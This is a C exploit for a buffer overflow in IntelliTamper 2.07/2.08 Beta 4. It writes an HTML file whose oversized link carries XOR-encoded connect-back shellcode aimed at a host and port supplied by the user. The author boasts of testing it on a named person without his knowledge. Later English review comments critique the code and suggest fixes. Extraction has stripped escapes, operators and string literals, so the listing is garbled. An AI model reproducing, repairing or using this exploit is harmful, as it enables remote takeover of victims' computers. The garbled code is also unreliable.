/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */
/********************************************************************/
/* NO MORE */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/********************************************************************/
/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */
/* Jef_FR pourra vous le confirmer hihi :P */
/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */
/* ben y'a du SEH alors le premier lien qui est fait plus petit */
/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */
/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */
/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */
/* j'ai remarqué que sur les deux versions une fois que ca crash */
/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */
/* cet offset toujours le meme (~fin de notre buffer). J'ai pas */
/* regardé sur d'autres plateformes, vu que j'ai deja des ret */
/* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */
/* */
/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */
/* opcode du genre < > " r n ... C'est pas sorcier a coder :) */
/********************************************************************/
/* informations: www.coromputer.net, irc undernet #coromputer */
/********************************************************************/
#include
#include
#include
#ifdef _WIN32
#include
#pragma comment(lib, "ws2_32")
#else
#include
#endif
#define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07
* for v2.07 it isn't this size 'cause
* there's a *missing* in RET_ADDR2
* so it cuts the size.
*/
#define SCOFFSET 10000 /* IntelliTamper v2.08 Beta 4 */
#define RET_POS SIZEOF-4
#define RET_ADDR 0x004368C4
#define SCOFFSET2 100 /* IntelliTamper v2.07 */
#define RET_POS2 6832
#define RET_ADDR2 0x00437224
#define u_short unsigned short
#define u_char unsigned char
#define HOP 0xd9 /* host opcode */
#define POP 0xda /* port opcode */
#define BEGIN "
hirnrn"#define END "rn"
/*
 * set_sc - encode the caller-supplied host address and port and patch
 * them over two marker sequences inside `sc`.
 *
 * NOTE(review): this listing lost characters in extraction: the bound
 * of the `for` on the scan line, the `+` in `sc[i+1]`/`sc+i`, the
 * operator before `=` on the `p =0x0002` line, and the backslash of the
 * `\n` at the end of the error message.  It does not compile as shown;
 * the comments below describe only what is still visible.
 *
 * host: dotted-quad string passed to inet_addr().  inet_addr() returns
 *       INADDR_NONE for a malformed address and that value is never
 *       checked, so bad input is encoded and written rather than
 *       rejected here.
 * port: converted with htons(), shifted into the upper half-word, the
 *       lower half-word then set from the 0x0002 constant, and the whole
 *       word XORed with the same fixed mask as the address.
 * sc:   writable buffer scanned for a run of four HOP bytes and a run of
 *       four POP bytes; each run is overwritten in place with the
 *       corresponding encoded value and the local is zeroed to record
 *       that the marker was found.
 *
 * Returns 0 when both markers were found, -1 (after printing) otherwise.
 * The `ip||p` test doubles as the not-found check, so an encoded value
 * that happened to be 0 would be mis-reported as "not found".
 */
int set_sc(char *host,unsigned long port, char *sc)
{
unsigned long ip,p;
unsigned int i;
ip=inet_addr(host)^0x98989898;
p=htons((u_short)port);
p=p<<16;
p =0x0002;
p=p^0x98989898;
/* The scan reads up to sc[i+3]; whatever bound the original loop used
 * must stop three short of the end of sc to stay in bounds.  Bytes are
 * compared as unsigned char because plain char may be signed. */
for(i=0;i if((u_char)sc[i]==HOP&&(u_char)sc[i 1]==HOP)
if((u_char)sc[i 2]==HOP&&(u_char)sc[i 3]==HOP) {
/* Copies the first four bytes of an unsigned long; that is the 32-bit
 * value only on ILP32 or on a little-endian LP64 host. */
memcpy(sc i,&ip,4);
ip=0;
}
if((u_char)sc[i]==POP&&(u_char)sc[i 1]==POP)
if((u_char)sc[i 2]==POP&&(u_char)sc[i 3]==POP) {
memcpy(sc i,&p,4);
p=0;
}
}
if(ip||p) {
/* Trailing "n" is the remains of a "\n" escape. */
printf("error: unable to find ip/port sequence in shellc0den");
return -1;
}
return 0;
}
/*
 * syntax - print the usage line for `prog` and terminate the process.
 *
 * NOTE(review): the format string was truncated in extraction (everything
 * after "%s " is gone), so the exact usage text is not recoverable from
 * this listing.  The function exits with status 0 although it is only
 * reached on a usage error; a non-zero status is the conventional signal
 * to a calling script.  Because it never returns, callers rely on it to
 * stop execution (see the argc check in main()).
 */
void syntax(char *prog)
{
printf("syntax: %s exit(0);
}
/*
 * banner - print the tool's identification lines to stdout.
 *
 * NOTE(review): the strings appear to have lost their backslashes in
 * extraction ("nt", "n" and "tt" read as the remains of \n and \t
 * escapes); as written they print those letters literally.  No format
 * conversions are present, so the calls are otherwise harmless.
 */
void banner(void)
{
printf("nt[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit "
"by kralor [Crpt]n");
printf("tt www.coromputer.net && undernet #coromputernn");
return;
}
/*
 * main - build the output file described by the arguments.
 *
 * Argument layout, inferred from the status line printed below (confirm
 * against syntax()): argv[1] = output path, argv[2] = host, argv[3] = port.
 *
 * NOTE(review): this listing does not compile as shown.  Extraction has
 * dropped the backslash from every escape sequence, the `+` from pointer
 * arithmetic (`buffer SCOFFSET2` was presumably `buffer + SCOFFSET2`),
 * and the tail of several string literals; the stray `rn");` fragments
 * after the closing brace are the remains of those literals.  The
 * comments below review only the logic that is still visible.
 *
 * Returns 0 on success and -1 for a rejected port, a set_sc() failure or
 * an output file that cannot be opened; a wrong argument count ends the
 * process inside syntax().
 */
int main(int argc, char *argv[])
{
/* SIZEOF bytes of automatic storage.  It is filled with 0x90 below and
 * never given an explicit terminator, so whether the fprintf(file,buffer)
 * calls stop inside the array depends on a zero byte occurring in the
 * data copied into it. */
char buffer[SIZEOF];
unsigned long port;
FILE *file;
char shellc0de[] = /* sizeof(shellc0de xorer) == 334 bytes */
/* classic xorer */
/* "xcc" */
"xebx02xebx05xe8xf9xffxffxffx5bx80xc3x10x33xc9x66"
"xb9x3fx01x80x33x98x43xe2xfa"
/* shellc0de */
"x19x5cx50x98x98x98x13x74x13x6cxcdxcexfcx39xa8x98"
"x98x98x13xd8x94x13xe8x84x35x13xf0x90x73x98x13x5d"
"xc6xc5x11x9ex67xaexf0x16xd6x96x74x70x35x98x98x98"
"xf0xabxaax98x98xf0xefxebxaaxc7xccx67x48x13x60xcf"
"xf0x41x91x6dx35x70x0bx98x98x98xabx51xc9xc9xc9xc9"
"xd9xc9xd9xc9x67x48x11xdexbcxcfxf0x74x61x32xf8x70"
"xe1x98x98x98xf0xd9xd9xd9xd9xf0xdaxdaxdaxdax13x54"
"xf2x88xc9x67xeexbcx67x48xf0xfbxf5xfcx98x11xfexa8"
"x67xaexf0xeax66x2bx8ex70xc9x98x98x98x11xdex86x1b"
"x74xccx15xa4xbcxabx58xabx51x1bx59x8dx33x7ax65x5e"
"xdcxbcx88xdcx66xdcxbcxa5x66xdcxbcxa4x13xdexbcx11"
"xdcxbcxd0x11xdcxbcxd4x11xdcxbcxc8x15xdcxbcx88xcc"
"xc8xc9xc9xc9xf2x99xc9xc9x67xeexa8xc9x67xcex86x67"
"xaexf0x77x56x78xf8x70x9ax98x98x98x67x48xcbxcdxce"
"xcfx13xf4xbcx80x13xddxa4x13xccx9dxe0x9bx4dx13xd2"
"x80x13xc2xb8x9bx45x7bxaaxd1x13xacx13x9bx6dxabx67"
"x64xabx58x34xa2x5cxecx9fx59x57x95x9bx60x73x6axa3"
"xe4xbcx8cxedx79x13xc2xbcx9bx45xfex13x94xd3x13xc2"
"x84x9bx45x13x9cx13x9bx5dx73x9axabx58x13x4dxc7xc6"
"xc5xc3x5ax9cx98";
banner();
/* syntax() does not return, so argc == 4 holds from here on. */
if(argc!=4)
syntax(argv[0]);
/* atoi() reports no errors: non-numeric input becomes 0 and is caught
 * only by the range test.  port is unsigned, so `port<=0` matches only
 * 0; a negative string wraps to a large value and is rejected by the
 * upper bound instead.  strtoul() with endptr/errno checks would make
 * the rejection explicit. */
port=atoi(argv[3]);
/* NOTE(review): the message literal below was truncated in extraction. */
if(port<=0||port>65535) {
printf("error: return -1;
}
/* `%d` with an unsigned long argument is a format/type mismatch (UB);
 * `%lu` matches.  "rn" is the remains of a "\r\n" escape here and in
 * every status line below. */
printf("[S] ip: %s port: %d file: %srn",argv[2],port,argv[1]);
printf("[C] Setting universal %-39s ...","shellcode");
/* set_sc() prints its own diagnostic; -1 here mirrors its failure. */
if(set_sc(argv[2],port,shellc0de))
return -1;
printf("DONErn");
file=fopen(argv[1],"w");
if(!file) {
printf("error: unable to open %srn",argv[1]);
return -1;
}
printf("[C] Writing magic link for Intellitamper %-20s ...","v2.07");
fprintf(file,BEGIN);
/* NOTE(review): literal truncated in extraction; the rest of this line
 * is not recoverable from the listing. */
fprintf(file,"sex drugs and rock'n'roll
memset(buffer,0x90,sizeof(buffer));
/* Stores sizeof(unsigned long) bytes through an unaligned pointer into a
 * char array: an alignment and strict-aliasing violation.  On an LP64
 * platform unsigned long is 8 bytes, so the matching store at RET_POS
 * (SIZEOF-4) further below writes 4 bytes past the end of buffer. */
*(unsigned long*)&buffer[RET_POS2] = RET_ADDR2;
/* `buffer SCOFFSET2` and the two lines after it lost their `+`. */
memcpy(buffer SCOFFSET2,shellc0de,sizeof(shellc0de)-1);
memcpy(buffer 6836-8,"xEBxE0",2); /* jmp $ - 0x10 */
memcpy(buffer 6836-16,"xE9x8FxE5xFFxFF",5); /* jmp $ - ??? */
/* fprintf(file,buffer) passes a non-literal, binary-filled buffer as the
 * format string (CERT FIO30-C): any 0x25 ('%') byte in it is parsed as a
 * conversion and consumes arguments that were never passed.  fputs(), or
 * fwrite() with an explicit length, is the conventional form.  The
 * `fprintf(file,"` prefix and the next line are truncated literals. */
fprintf(file," fprintf(file,buffer);
fprintf(file,"">sexy bitch printf("DONErn");
printf("[C] Writing magic link for Intellitamper %-20s ...","v2.08 Beta 4");
memset(buffer,0x90,sizeof(buffer));
/* Same unaligned/oversized store as above; on LP64 this one overruns
 * buffer by 4 bytes. */
*(unsigned long*)&buffer[RET_POS] = RET_ADDR;
memcpy(buffer SCOFFSET,shellc0de,sizeof(shellc0de)-1);
memcpy(buffer SIZEOF-8,"xEBxE0",2); /* jmp $ - 0x10 */
memcpy(buffer SIZEOF-16,"xE9x8FxEBxFFxFF",5); /* jmp $ - ??? */
/* Same non-literal format string issue as the first write. */
fprintf(file," fprintf(file,buffer);
fprintf(file,"">not sexy bitch printf("DONErn");
fprintf(file,END);
/* fclose() flushes a write stream; its return value is not checked, so a
 * short or failed write to argv[1] is reported as success. */
fclose(file);
printf("[C] All job donern");
return 0;
}
rn");
rn");
rn");